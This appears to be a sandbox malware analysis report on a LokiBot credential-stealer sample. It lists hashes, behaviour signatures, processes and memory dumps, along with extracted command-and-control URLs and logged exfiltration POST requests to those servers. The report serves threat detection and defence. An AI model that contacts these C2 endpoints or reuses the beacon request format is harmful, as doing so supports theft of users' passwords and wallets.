Overview

overview

10

Static

static

3

cryptolaemus

windows10-2004-x64

10

cryptolaemus

windows11-21h2-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/06/2024, 07:22 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe

  • Size

    496KB

  • MD5

    4079a6d6e87057582e467161d233e7cb

  • SHA1

    ea54e95a5fa38f415166b3290c0c1f107f8c0cda

  • SHA256

    3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92

  • SHA512

    c672ccc97b9c04b1ab36fbc17d6d0e3948aceddad0fc397e2c7e1f66dd09dd885015331a91addd1541045de733528c1c16f5ad5f88f1991a276b50776e5a1b9e

  • SSDEEP

    6144:VTVFZInd6Xcfg9USG99KBOBJw/At7ENWWj0JBMufClIxkzhorWG7RCUsw3y:V5kndmJCEgjC6xSerudw

Score
10/10
lokibotcollectionspywarestealertrojan

Malware Config

Extracted

Family

lokibot

C2

http://midwestsoil.top/alpha/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe
    "C:\Users\Admin\AppData\Local\Temp\3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2444
    • C:\Users\Admin\AppData\Local\Temp\3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe
      "C:\Users\Admin\AppData\Local\Temp\3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe"
      2⤵
      • Accesses Microsoft Outlook profiles
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:4400

Network

  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    82.90.14.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    82.90.14.23.in-addr.arpa
    IN PTR
    Response
    82.90.14.23.in-addr.arpa
    IN PTR
    a23-14-90-82deploystaticakamaitechnologiescom
  • flag-us
    DNS
    midwestsoil.top
    3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe
    Remote address:
    8.8.8.8:53
    Request
    midwestsoil.top
    IN A
    Response
    midwestsoil.top
    IN A
    104.21.23.190
    midwestsoil.top
    IN A
    172.67.212.234
  • flag-us
    POST
    http://midwestsoil.top/alpha/five/fre.php
    3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe
    Remote address:
    104.21.23.190:80
    Request
    POST /alpha/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: midwestsoil.top
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: B07E448C
    Content-Length: 358
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 27 Jun 2024 07:22:16 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Status: 404 Not Found
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMIOAB2sGaCgemmFNWsMYm8CAygnfbD3P8JIy4EXQ%2BRAGbvy9LudU4BmH3t1DfTLvABFAif1T6AsdMhUmR8%2BTRT9%2FCrdt3c%2BvUO8lnaHyEuKJcfMrdMBlQ0RUYUJVItG23Q%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89a3af5c3a846536-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    POST
    http://midwestsoil.top/alpha/five/fre.php
    3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe
    Remote address:
    104.21.23.190:80
    Request
    POST /alpha/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: midwestsoil.top
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: B07E448C
    Content-Length: 180
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 27 Jun 2024 07:22:16 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Status: 404 Not Found
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4J9DdsSOObAjRtP6l6riai00DmaEU1mA8hK2vFCPlKPDueea6wL7NuFqcUpSkhtQDp3Serq2rnFu%2Fx633HXQa6cgY25ndzIubuf%2Fgl%2BXul08tVQ26T1uZwfQwRJNJvcgNKc%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89a3af5dbc3023ed-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    190.23.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    190.23.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    64.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    64.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    POST
    http://midwestsoil.top/alpha/five/fre.php
    3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe
    Remote address:
    104.21.23.190:80
    Request
    POST /alpha/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: midwestsoil.top
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: B07E448C
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 27 Jun 2024 07:22:16 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Status: 404 Not Found
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FPiVxY9JaEy5jvicQxw4dPeLcpBF7ztyff7PShnSub7Wv239U%2FQXwIsPEpfaQDNsf%2F9YTOTdN39lHGpRTa%2FNBdkePrwEaAfJvDRuvM5MXB%2BDdfysE3t9X0V4AipIDKbnvzE%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89a3af5f0b34636d-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    26.165.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.165.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    134.71.91.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    134.71.91.104.in-addr.arpa
    IN PTR
    Response
    134.71.91.104.in-addr.arpa
    IN PTR
    a104-91-71-134deploystaticakamaitechnologiescom
  • flag-us
    POST
    http://midwestsoil.top/alpha/five/fre.php
    3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe
    Remote address:
    104.21.23.190:80
    Request
    POST /alpha/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: midwestsoil.top
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: B07E448C
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 27 Jun 2024 07:23:17 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Status: 404 Not Found
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oO00hrY91%2F7Dk3S009SsNJr36OyUj3M%2FVc7FwrOtDmal%2FJ9V4lvLaSVUMHZcL4OLN%2F6cKtzdYs49YArIIdVl6GbrThIvMdSy%2FIYQXzQfSIWzQrzeV3pYUCVoAtMO5XV9pFY%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89a3b0d70e8c7777-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    POST
    http://midwestsoil.top/alpha/five/fre.php
    3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe
    Remote address:
    104.21.23.190:80
    Request
    POST /alpha/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: midwestsoil.top
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: B07E448C
    Content-Length: 153
    Connection: close
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 27 Jun 2024 07:24:17 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/5.4.16
    Status: 404 Not Found
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y2bO5rQxlgTienTDJWaPJZpzpy0BD4HM03%2FkTHBlBOtd75ib7uevw9L7W%2BK72CM5xB%2BB2UFtx3NP1bo%2FWWTaCGzb3drOedF5slIi8LwWyF%2FC09e%2FiRs8jZu0k8s%2BWSD51mU%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 89a3b24f3da0778c-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    10.73.50.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    10.73.50.20.in-addr.arpa
    IN PTR
    Response
  • 104.21.23.190:80
    http://midwestsoil.top/alpha/five/fre.php
    http
    3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe
    874 B
     871 B
     6
    6

    HTTP Request

    POST http://midwestsoil.top/alpha/five/fre.php

    HTTP Response

    404
  • 104.21.23.190:80
    http://midwestsoil.top/alpha/five/fre.php
    http
    3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe
    696 B
     869 B
     6
    6

    HTTP Request

    POST http://midwestsoil.top/alpha/five/fre.php

    HTTP Response

    404
  • 104.21.23.190:80
    http://midwestsoil.top/alpha/five/fre.php
    http
    3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe
    669 B
     881 B
     6
    6

    HTTP Request

    POST http://midwestsoil.top/alpha/five/fre.php

    HTTP Response

    404
  • 104.21.23.190:80
    http://midwestsoil.top/alpha/five/fre.php
    http
    3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe
    669 B
     881 B
     6
    6

    HTTP Request

    POST http://midwestsoil.top/alpha/five/fre.php

    HTTP Response

    404
  • 104.21.23.190:80
    http://midwestsoil.top/alpha/five/fre.php
    http
    3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe
    669 B
     885 B
     6
    6

    HTTP Request

    POST http://midwestsoil.top/alpha/five/fre.php

    HTTP Response

    404
  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

  • 8.8.8.8:53
    82.90.14.23.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    82.90.14.23.in-addr.arpa

  • 8.8.8.8:53
    midwestsoil.top
    dns
    3e413cd70e1b19e81efe9c6560834b9dfc7da53a57e2070e4b1e9864702c3e92.exe
    61 B
     93 B
     1
    1

    DNS Request

    midwestsoil.top

    DNS Response

    104.21.23.190
    172.67.212.234

  • 8.8.8.8:53
    190.23.21.104.in-addr.arpa
    dns
    72 B
     134 B
     1
    1

    DNS Request

    190.23.21.104.in-addr.arpa

  • 8.8.8.8:53
    64.159.190.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    64.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
     144 B
     1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    26.165.165.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    26.165.165.52.in-addr.arpa

  • 8.8.8.8:53
    134.71.91.104.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    134.71.91.104.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    10.73.50.20.in-addr.arpa
    dns
    70 B
     156 B
     1
    1

    DNS Request

    10.73.50.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2804150937-2146708401-419095071-1000\0f5007522459c86e95ffcc62f32308f1_5a32ead2-14a8-4b34-b6a3-85cfb28e2fbd
    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2804150937-2146708401-419095071-1000\0f5007522459c86e95ffcc62f32308f1_5a32ead2-14a8-4b34-b6a3-85cfb28e2fbd
    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    Download Submit

  • memory/2444-8-0x0000000004D80000-0x0000000004D88000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2444-14-0x0000000075150000-0x0000000075900000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2444-4-0x0000000075150000-0x0000000075900000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/2444-5-0x0000000004CE0000-0x0000000004CEA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2444-6-0x0000000004D30000-0x0000000004D7E000-memory.dmp

    Filesize

    312KB

    Download

  • memory/2444-7-0x0000000004E30000-0x0000000004ECC000-memory.dmp

    Filesize

    624KB

    Download

  • memory/2444-0-0x000000007515E000-0x000000007515F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2444-1-0x0000000000050000-0x00000000000D2000-memory.dmp

    Filesize

    520KB

    Download

  • memory/2444-2-0x00000000050C0000-0x0000000005664000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/2444-3-0x0000000004B10000-0x0000000004BA2000-memory.dmp

    Filesize

    584KB

    Download

  • memory/4400-12-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/4400-11-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/4400-33-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/4400-9-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

    Download

  • memory/4400-41-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.